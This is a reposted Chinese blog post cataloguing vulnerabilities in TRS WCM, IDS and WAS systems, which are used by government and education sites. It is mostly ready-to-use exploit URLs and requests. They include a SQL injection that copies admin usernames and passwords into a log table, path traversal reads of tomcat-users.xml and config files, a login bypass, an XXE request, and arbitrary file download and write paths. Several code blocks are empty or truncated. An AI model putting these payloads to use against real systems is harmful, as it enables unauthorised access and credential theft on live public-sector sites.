转自 https://chmod.cf/2017/06/22/TRS%E6%BC%8F%E6%B4%9E%E6%95%B4%E7%90%86/
0x00 前言
TRS北京拓尔思信息技术股份有限公司,其业务系统主要应用于政府、教育、企业等领域,漏洞较多系统有WCM(内容管理系统)、WAS(文本检索系统)、IDS(身份管理系统)。好多客户用到这个,记录一下
0x01 WCM内容管理系统
1.1 WCM5.2~WCM6.5存在SQL注入
首先是这个页面,http://xx.xx.xx/portal/db/dbupdatelog_list.jsp
直接注入
1 | http://agent.trs.cn/portal/db/db ... &OrderType=desc;/**/update/**/WCMDBUPDATELOG/**/set/**/LogTitle=%28select/**/top/**/1/**/UserName%2bPassWord/**/from/**/WCMUSER%29/**/where/**/1=1--&OrderField=TableName&SearchKey=CrTime&PageItemCount=15&SearchTable=WCMDBUPDATELOG |
http://xx.xx.xx/wcm/app/system/read_image.jsp?Filename=../../../tomcat/conf/tomcat-users.xml
1 |
|
HTTP://xx.xx.xx/wcm/infoview.do?serviceid=wcm6_user&MethodName=getOnlineUsers
1 |
|
http://xx.xx.xx/wcm/infoview.do
1 |
|
1 |
|
1 |
|
wcm/infoview.do?serviceid=wcm6_user&MethodName=getUsersByNames&UserNames=admin
```
之前的漏洞说查看管理员信息的危害不大是因为MD5
加密只取半截,并且即使破解还有可能遇到admin
账号未启用的问题
这时我们点击浏览器的后退按钮或在地址栏的网址后面直接输入wcm/app/login.jsp
,这样就绕过权限登录了
1.6 WCM全版本任意文件写入漏洞
这个是16年年初出的漏洞,当初协助北京公司做过一次排查。
是利用webservices
的importDocuments
接口匿名访问,加上畸形文件名进行利用,未找到poc
0x02 IDS身份管理系统
2.1 IDS系统任意文件读取和信息泄露漏洞
漏洞文件路径在admin/debug/
目录下,读取文件为fv.jsp
,信息泄露为env.jsp
等,直接访问文件即可
2.2 XXE漏洞
使用DNS Log
进行记录
POST /ids/service?idsServiceType=jitSyncUser HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: trsidsssosessionid=2382B8AE9E8FB5B441212CE2595F963E**.**.**.**
X-Forwarded-For: **.**.**.**
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------1988224119974
Content-Length: 196
]>&xxe;
0x03 WAS文本检索系统
3.1 WAS未授权访问
安装目录下was40/tree
文件可以看到一些后台功能
访问was40/passwd/passwd.htm
输入一个不存在的用户名会暴露出服务器内网IP地址 同时存在暴力破解用户密码的可能性
3.2 未授权发布信息
编辑信息的时候未对提交的数据进行过滤,同时存在未对用户是否登录进行验证
0x04 WAS任意文件读取
问题出在/was5/web/tree
文件下,构造路径可以任意读取文件,这个就创宇提的那个漏洞
http://xx.xx.xx/was5/web/tree?treefile=/WEB-INF/classes/com/trs/was/resource/wasconfig.properties
0x05 WAS任意文件下载漏洞
问题出在was5/admin/template/download_templet.jsp
文件下,构造type
参数的值可以任意下载文件,
http://xx.xx.xx/was5/admin/template/download_templet.jsp?type=../web/tagscloud
0x06 WAS任意文件写入
漏洞文件是was5/admin/template/customize/detailcustomize
,构造template
的参数值进行任意文件写入
同理还有一个问题文件/was5/admin/template/customize/outlinecustomize
,利用方式一样